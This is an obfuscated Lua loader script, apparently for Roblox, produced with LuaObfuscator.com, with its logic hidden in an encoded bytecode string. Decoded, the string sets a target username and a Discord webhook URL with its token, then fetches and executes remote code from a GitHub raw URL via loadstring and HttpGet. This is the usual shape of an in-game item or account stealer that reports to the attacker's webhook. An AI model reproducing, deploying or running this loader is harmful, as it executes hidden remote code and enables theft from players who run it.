--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v86=v2(v0(v30,16));if v19 then local v117=v5(v86,v19);v19=nil;return v117;else return v86;end end end);local function v20(v31,v32,v33) if v33 then local v87=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-((118 -(32 + 85)) + 0))) + 1 + 0 + 0)) ;return v87-(v87%(620 -(555 + 64))) ;else local v88=1637 -(1523 + 26 + 88) ;local v89;while true do if (v88==(931 -(857 + 74))) then v89=(570 -(367 + 201))^(v32-(1066 -(68 + 997))) ;return (((v31%(v89 + v89))>=v89) and (1271 -(226 + 1044))) or (0 -(957 -(892 + 65))) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=0 -0 ;local v36;local v37;while true do if (v35==(1 -0)) then return (v37 * (469 -213)) + v36 ;end if (v35==(350 -(87 + 263))) then v36,v37=v1(v16,v18,v18 + (182 -(67 + 113)) );v18=v18 + 2 + 0 + 0 ;v35=2 -1 ;end end end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + 3 );v18=v18 + (15 -11) ;return (v41 * (16778168 -(802 + 150))) + (v40 * 65536) + (v39 * (689 -433)) + v38 ;end local function v24() local v42=v23();local v43=v23();local v44=1 + 0 ;local v45=(v20(v43,1 -(0 -0) ,20) * ((2 + 0)^(1029 -(915 + 82)))) + v42 ;local v46=v20(v43,59 -38 ,8 + 11 + 12 );local v47=((v20(v43,(141 -100) -9 )==(773 -(201 + 571))) and  -(1139 -((1863 -(760 + 987)) + 1022))) or (4 -3) ;if (v46==(0 + 0)) then if (v45==(1187 -(1069 + 118))) then return v47 * (0 -0) ;else local v118=0 -0 ;while true do if (v118==(0 + 0)) then v46=(1914 -(1789 + 124)) -0 ;v44=0 + 0 ;break;end end end elseif (v46==(2838 -(368 + 423))) then return ((v45==(0 -0)) and (v47 * ((19 -(10 + 8))/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-(1465 -(416 + 26)) ) * (v44 + (v45/((6 -4)^(175 -123)))) ;end local function v25(v48) local v49;if  not v48 then v48=v23();if (v48==(766 -(745 + 21))) then return "";end end v49=v3(v16,v18,(v18 + v48) -1 );v18=v18 + v48 ;local v50={};for v67=1 + 0 , #v49 do v50[v67]=v2(v1(v3(v49,v67,v67)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return function(v90,v91,v92,v93,v94,v95,v96,v97) local v90=(function() return 479 -(83 + 396) ;end)();local v91=(function() return;end)();local v93=(function() return;end)();while true do if (v90~=(1900 -(106 + 1794))) then else local v123=(function() return 0 + 0 ;end)();local v124=(function() return;end)();while true do if (v123~=(0 -0)) then else v124=(function() return 0 + 0 ;end)();while true do if (v124~=(0 + 0)) then else v91=(function() return v92();end)();v93=(function() return nil;end)();v124=(function() return 1;end)();end if ((561 -(306 + 254))~=v124) then else v90=(function() return  #"|";end)();break;end end break;end end end if (v90~= #"]") then else if (v91== #"<") then v93=(function() return v92()~=(0 + 0) ;end)();elseif (v91==(5 -3)) then v93=(function() return v94();end)();elseif (v91== #"xxx") then v93=(function() return v95();end)();end v96[v97]=(function() return v93;end)();break;end end return v90,v91,v92,v93,v94,v95,v96,v97;end;end)();local v52=(function() return function(v98,v99,v100,v101,v102,v103,v104,v105,v106) local v107=(function() return 0 -0 ;end)();local v98=(function() return;end)();local v99=(function() return;end)();while true do local v116=(function() return 1467 -(899 + 568) ;end)();while true do if (v116==(114 -(4 + 110))) then if (v107~=(1 + 0)) then else local v126=(function() return 0;end)();while true do if ((584 -(57 + 527))==v126) then while true do if (v98==(1427 -(41 + 1386))) then v99=(function() return v100();end)();if (v101(v99, #"]", #"}")~=(0 -0)) then else local v177=(function() return 603 -(268 + 335) ;end)();local v178=(function() return;end)();local v179=(function() return;end)();local v180=(function() return;end)();local v181=(function() return;end)();while true do if (v177~=0) then else local v182=(function() return 0;end)();while true do if (v182==(1 + 0)) then v177=(function() return 291 -(60 + 230) ;end)();break;end if (0==v182) then v178=(function() return 0 -0 ;end)();v179=(function() return nil;end)();v182=(function() return 573 -(426 + 146) ;end)();end end end if (v177==(167 -(122 + 44))) then v180=(function() return nil;end)();v181=(function() return nil;end)();v177=(function() return 2;end)();end if (v177~=(1 + 1)) then else while true do if (v178== #"/") then local v183=(function() return 0 -0 ;end)();local v184=(function() return;end)();while true do if (v183==(0 + 0)) then v184=(function() return 1456 -(282 + 1174) ;end)();while true do if (v184==(811 -(569 + 242))) then v181=(function() return {v102(),v102(),nil,nil};end)();if (v179==(0 -0)) then local v191=(function() return 0;end)();local v192=(function() return;end)();while true do if (v191~=(0 + 0)) then else v192=(function() return 0;end)();while true do if (v192==(1024 -(706 + 318))) then v181[ #"xxx"]=(function() return v102();end)();v181[ #".com"]=(function() return v102();end)();break;end end break;end end elseif (v179== #":") then v181[ #"xnx"]=(function() return v103();end)();elseif (v179==(1253 -(721 + 530))) then v181[ #"nil"]=(function() return v103() -((1273 -(945 + 326))^16) ;end)();elseif (v179== #"19(") then local v199=(function() return 0;end)();local v200=(function() return;end)();while true do if (v199==(0 + 0)) then v200=(function() return 0 -0 ;end)();while true do if (v200~=(0 -0)) then else v181[ #"91("]=(function() return v103() -((1214 -(323 + 889))^(15 + 1)) ;end)();v181[ #"0836"]=(function() return v102();end)();break;end end break;end end end v184=(function() return 1;end)();end if (v184==(2 -1)) then v178=(function() return 582 -(361 + 219) ;end)();break;end end break;end end end if (v178~= #"19(") then else if (v101(v180, #"xxx", #"nil")~= #"}") then else v181[ #"xnxx"]=(function() return v104[v181[ #".dev"]];end)();end v105[v106]=(function() return v181;end)();break;end if (v178==(702 -(271 + 429))) then local v186=(function() return 0;end)();local v187=(function() return;end)();while true do if (v186==(0 + 0)) then v187=(function() return 1500 -(1408 + 92) ;end)();while true do if (v187==(1087 -(461 + 625))) then v178=(function() return  #"asd";end)();break;end if (v187==(413 -(15 + 398))) then if (v101(v180, #" ", #":")== #"[") then v181[1290 -(993 + 295) ]=(function() return v104[v181[1 + 1 ]];end)();end if (v101(v180,2 + 0 ,2 + 0 )== #"~") then v181[ #"19("]=(function() return v104[v181[ #"asd"]];end)();end v187=(function() return 851 -(20 + 830) ;end)();end end break;end end end if (v178==(1171 -(418 + 753))) then local v188=(function() return 126 -(116 + 10) ;end)();local v189=(function() return;end)();while true do if (v188==(0 + 0)) then v189=(function() return 0 + 0 ;end)();while true do if (v189==0) then v179=(function() return v101(v99,740 -(542 + 196) , #"19(");end)();v180=(function() return v101(v99, #"http",1 + 5 );end)();v189=(function() return 1 + 0 ;end)();end if (v189==(1 + 0)) then v178=(function() return  #"}";end)();break;end end break;end end end end break;end end end break;end end return v98,v99,v100,v101,v102,v103,v104,v105,v106;end end end if (v107==0) then local v127=(function() return 0 -0 ;end)();while true do if (v127==(529 -(406 + 123))) then v98=(function() return 0 + 0 ;end)();v99=(function() return nil;end)();v127=(function() return 1;end)();end if (v127~=(1770 -(1749 + 20))) then else v107=(function() return 1 + 0 ;end)();break;end end end break;end end end end;end)();local v53=(function() return function(v108,v109,v110) local v111=(function() return 0 -0 ;end)();local v112=(function() return;end)();while true do if (v111~=(0 -0)) then else v112=(function() return 1322 -(1249 + 73) ;end)();while true do if (v112==(1551 -(1126 + 425))) then local v128=(function() return 0 + 0 ;end)();local v129=(function() return;end)();while true do if (v128==(1145 -(466 + 679))) then v129=(function() return 0 -0 ;end)();while true do if (v129~=(0 -0)) then else v108[v109-#"|" ]=(function() return v110();end)();return v108,v109,v110;end end break;end end end end break;end end end;end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {v54,v55,nil,v56};end)();local v58=(function() return v23();end)();local v59=(function() return {};end)();for v69= #"[",v58 do FlatIdent_12703,Type,v21,Cons,v24,v25,v59,v69=(function() return v51(FlatIdent_12703,Type,v21,Cons,v24,v25,v59,v69);end)();end v57[ #"91("]=(function() return v21();end)();for v70= #"{",v23() do FlatIdent_475BC,Descriptor,v21,v20,v22,v23,v59,v54,v70=(function() return v52(FlatIdent_475BC,Descriptor,v21,v20,v22,v23,v59,v54,v70);end)();end for v71= #"/",v23() do v55,v71,v28=(function() return v53(v55,v71,v28);end)();end return v57;end local function v29(v61,v62,v63) local v64=v61[(1140 -(782 + 356)) -1 ];local v65=v61[379 -(142 + 235) ];local v66=v61[13 -10 ];return function(...) local v72=v64;local v73=v65;local v74=v66;local v75=v27;local v76=1;local v77= -(1 + 0);local v78={};local v79={...};local v80=v12("#",...) -((1245 -(176 + 91)) -(553 + 424)) ;local v81={};local v82={};for v113=0 -0 ,v80 do if ((v113>=v74) or (846>=2368)) then v78[v113-v74 ]=v79[v113 + 1 + (0 -0) ];else v82[v113]=v79[v113 + 1 + 0 ];end end local v83=(v80-v74) + 1 + 0 ;local v84;local v85;while true do v84=v72[v76];v85=v84[1 + 0 ];if ((v85<=(6 + 3)) or (4012<=3358)) then if ((1494<=3005) and (v85<=(8 -4))) then if ((v85<=(2 -1)) or (3111==2134)) then if (v85>0) then v63[v84[6 -3 ]]=v82[v84[(1 -0) + 1 ]];else local v132=v84[9 -7 ];local v133=v82[v84[756 -((1331 -(975 + 117)) + 514) ]];v82[v132 + 1 + 0 ]=v133;v82[v132]=v133[v84[4]];end elseif (v85<=(1331 -(797 + 532))) then v82[v84[2 + 0 ]]=v84[3];elseif (v85==(2 + 1)) then v82[v84[2]]();else v82[v84[4 -2 ]]();end elseif (v85<=6) then if (v85>(1207 -(373 + 829))) then local v139=v84[1877 -(157 + 1718) ];v82[v139]=v82[v139](v13(v82,v139 + 1 ,v77));else local v141=v84[2 + 0 ];local v142,v143=v75(v82[v141](v13(v82,v141 + 1 ,v84[3])));v77=(v143 + v141) -1 ;local v144=731 -(476 + 255) ;for v157=v141,v77 do v144=v144 + (1131 -(369 + (2701 -1940))) ;v82[v157]=v142[v144];end end elseif (v85<=(5 + 2)) then local v145=v84[2 -(0 -0) ];local v146=v82[v84[3]];v82[v145 + (1 -0) ]=v146;v82[v145]=v146[v84[242 -(64 + 174) ]];elseif (v85==(2 + 6)) then v82[v84[2 -0 ]]=v63[v84[(1357 -(697 + 321)) -(144 + 192) ]];else do return;end end elseif (v85<=(230 -(42 + 174))) then if (v85<=(9 + 2)) then if (v85>10) then if ((2355==2355) and (v82[v84[2 + 0 ]]==v84[2 + 2 ])) then v76=v76 + (1505 -(363 + 1141)) ;else v76=v84[1583 -(1183 + (1081 -684)) ];end else v82[v84[5 -3 ]]=v84[3 + 0 ];end elseif (v85<=(9 + (5 -2))) then v76=v84[3];elseif (v85>(1988 -(1913 + 62))) then v82[v84[2 + 0 ]]=v63[v84[3]];else local v165=v84[4 -2 ];local v166,v167=v75(v82[v165](v13(v82,v165 + (2 -1) ,v84[1936 -(565 + 1368) ])));v77=(v167 + v165) -(3 -2) ;local v168=(647 + 1014) -(1477 + 184) ;for v170=v165,v77 do v168=v168 + (1 -0) ;v82[v170]=v166[v168];end end elseif (v85<=(29 -13)) then if (v85>(14 + 1)) then do return;end else local v153=856 -(564 + (782 -490)) ;local v154;while true do if ((v153==(0 -0)) or (588<=432)) then v154=v84[(1232 -(322 + 905)) -3 ];v82[v154]=v82[v154](v13(v82,v154 + (305 -(244 + (671 -(602 + 9)))) ,v77));break;end end end elseif ((4797>=3895) and (v85<=(14 + 3))) then v63[v84[479 -((1230 -(449 + 740)) + 435) ]]=v82[v84[874 -(826 + 46) ]];elseif (v85>(1019 -((1885 -(245 + 702)) + 63))) then v76=v84[9 -6 ];elseif (v82[v84[2 + 0 ]]==v84[1129 -(936 + 189) ]) then v76=v76 + 1 + 0 ;else v76=v84[1616 -(1565 + 48) ];end v76=v76 + 1 + 0 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0A3Q00028Q00026Q00F03F030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403493Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F496D4469676974616C7A2F4D6F7269536372697074732F6D61696E2F4D6F72695363726970747303083Q00557365726E616D65030C3Q0070732Q3973746F636B31323303073Q00576562682Q6F6B03793Q00682Q7470733A2Q2F646973636F72642E636F6D2F6170692F776562682Q6F6B732F31333136333938342Q32302Q353435363830382F512D3844364F48445A576E30314951356D4C63594D2D484E512Q6C304B734C6D71524B6F4164387937502Q484A30462Q63466F7961364941354E5636695F35526B736B7700143Q0012023Q00013Q00260B3Q000B0001000200040C3Q000B0001001208000100033Q001208000200043Q00202Q000200020005001202000400064Q000D000200044Q000600013Q00022Q000300010001000100040C3Q0013000100260B3Q00010001000100040C3Q00010001001202000100083Q001201000100073Q0012020001000A3Q001201000100093Q0012023Q00023Q00040C3Q000100012Q00093Q00017Q00",v9(),...);
